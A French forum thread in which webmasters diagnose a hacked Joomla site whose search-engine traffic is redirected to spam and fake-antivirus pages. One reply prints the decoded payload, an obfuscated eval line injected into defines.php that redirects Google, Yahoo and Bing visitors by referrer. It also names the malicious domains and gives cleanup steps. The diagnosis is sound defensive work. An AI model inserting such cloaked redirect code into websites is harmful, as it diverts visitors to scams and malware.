Redirection Google piraté !!!

[Allance]

Bonjour,

Il y a un comportement bizarre dans les résultats de Google sur une requête.
Lorsque l'on tape "choeur symphonique" dans Google, le premier résultat affiche le site du Choeur Symponique de Paris, dont l'URL affiché est http://www.choeursymphonique.org
https://www.google.fr/search?q=choeur+symphonique

Le problème est que lorsqu'on clique sur ce lien, on arrive sur un autre site :
-http://p3p0.com/?said=3333g&q=choeur+symphonique

Cela voudrait dire que le résultat de Google a été piraté et la redirection du résultat sur un autre site.

 

[u8086]

A mon avis, c'est choeursymphonique.org qui est piraté.

 

[kanon90]

troublant en effet, mais non, c'est le site qui a été piraté, et en fonction du referer ( le résultat est le même si tu utilises yahoo) ca redirige ou pas l'adresse.

 

[Allance]

Non ce n'est pas le site qui est piraté car quand on tape son URL directement dans la barre d'adresse il n'y a pas de problème, et on a vérifié le site.

La version en cache du site est bonne également, c'est l'enregistrement de Google qui déconne.

 

[Allance]

Est-il possible qu'il ait été piraté à un moment donné, avec une redirection 301 qui a mis à jour les enregistrements Google et Yahoo, et ensuite le site corrigé ?

Google et Yahoo ont a ce moment là enregistré la nouvelle URL grâce à la redirection permanente, et maintenant difficile de revenir en arrière ?

On peut tracer cette redirection, si vous dites qu'elle est encore active en fonction du referer ?

 

[finstreet]

et plus sérieusement tu n'as pas pensé que c'était juste le pirate qui permettait de taper directement l'url dans le navigateur pour éviter de se faire repérer tout de suite et ainsi rester plus longtemps tout en captant 100% du trafic venant de Google ?

 

[Allance]

Et on peut le vérifier ça ?

Il y a possibilité de suivre les header http pour voir si c'est vraiment une redirection du site et pas un mauvais enregistrement dans Google ?

 

[guicara]

Il y a deux minutes en partant du lien de Google, je suis tombé sur une page redirigé, puis automatique sur une réduction du navigateur > fenêtre javascript > faux scannage AV.

URL : (ATTENTION) -http://www1.newsystem-shield.in

Et maintenant, plus moyen de revenir sur ce site via la recherche google (pas un problème de Cookie car testé sur un autre navigateur) !

quand on tape son URL directement dans la barre d'adresse il n'y a pas de problème

Par pour moi, un accès sur choeursymphonique.org me renvois sur le site de recherche.
Au chargement de la page j'ai aussi : fgnfdfthrv.bee.pl

EDIT : Tu n'ai pas le seul touché, une petite recherche sur cette dernière URL dans Google et tu à pléthore de renseignements (tu n'aurais pas le CMS Joomla par hasard ?).

EDIT 2 :

Yep that's it - i found an eval code in defines.php -

Un autre webmaster :

I found this code in the defines file (includes/defines.php) and removed it and it fixed the issue... should I keep any of it, I deleted the whole line of code from line 14

Le code malicieux en question :

* See COPYRIGHT.php for copyright notices and details.
*/ eval(base64_decode("CglpZiAoc3R...."));

qui se décode en :

if (stristr($_SERVER[HTTP_REFERER],"google")) {
	if (!stristr($_SERVER[HTTP_REFERER],".nu") and !stristr($_SERVER[HTTP_REFERER],"site") and !stristr($_SERVER[HTTP_REFERER],"inurl")){
		preg_match ("/q\=(.*)/",$_SERVER[HTTP_REFERER],$kk);
		if (stristr($kk[1],"&")) {
			preg_match ("/(.*?)\&/",$kk[1],$key2);
			$keyword=urldecode($key2[1]);
		}else {
			$keyword=urldecode($kk[1]);
		}
		header("Location: h**p://fgnfdfthrv.bee.pl/?q=".$keyword);
		exit();
	}

}elseif (stristr($_SERVER[HTTP_REFERER],"yahoo")) {
preg_match ("/p\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
		header("Location: h**p://fgnfdfthrv.bee.pl/?q=".$kk[1]);
		exit();
}elseif (stristr($_SERVER[HTTP_REFERER],"bing")) {
preg_match ("/q\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
		header("Location: h**p://fgnfdfthrv.bee.pl/?q=".$kk[1]);
		exit();
}

Donc il regardait bien le référer (google, yahoo ou bing). Mais ce qui est étrange, c'est qu'un appel direct de ta page renvois sur le site en question (je t'invite donc à regarder tes autres pages). (edit : ou peut l'accès direct contrôlé avec "$_SERVER[HTTP_REFERER],"inurl"" ?).

Donc :
1. Supprimer le code malicieux
2. Regarder si d'autres pages ne sont pas infectés
3. Sa ne serait pas un mal de changer des MDP (au cas où)
4. Mettre à jour Joomla dans sa dernière version

Tiens nous au courant !

 

[Allance]

Si c'est un joomla. Effectivement il y a bien un test du referer et une redirection vers bee.pl, j'ai pu tracer les header.

Où as-tu trouvé ce code ? Sur ce site ou sur des forums ?

Quel est la page corrompu ?

 

[guicara]

Le code est publié sur des forums (notamment allemand, mais tu le trouve aussi sur google groups).
Ta page concernée : -http://www.choeursymphonique.org/includes/defines.php

 

[Allance]

Merci

 

[kanon90]

Non ce n'est pas le site qui est piraté car quand on tape son URL directement dans la barre d'adresse il n'y a pas de problème, et on a vérifié le site.

La version en cache du site est bonne également, c'est l'enregistrement de Google qui déconne.

heureusement que le site a été vérifié :mrgreen:

Ca serait quand même un comble que google soit attaqué pour au final pirater ton site ;-)

bon courage pour les corrections :wink:

 

[Allance]

Ce n'est pas moi qui administre ce site
OVH avait fait une vérification du site et avait dit qu'il était CLEAN... hum...

Faut dire que la modification était bien planqué

 

[DVCAM]

J'ai été victime également avec un site Joomla.
L'outil pour webmaster/diagnostics/logiciels malveillants de google n'avait rien détecté non plus.

Après tout, c'est peut-être logique car googlebot ne scanne pas la partie administration de joomla ?!...

cdt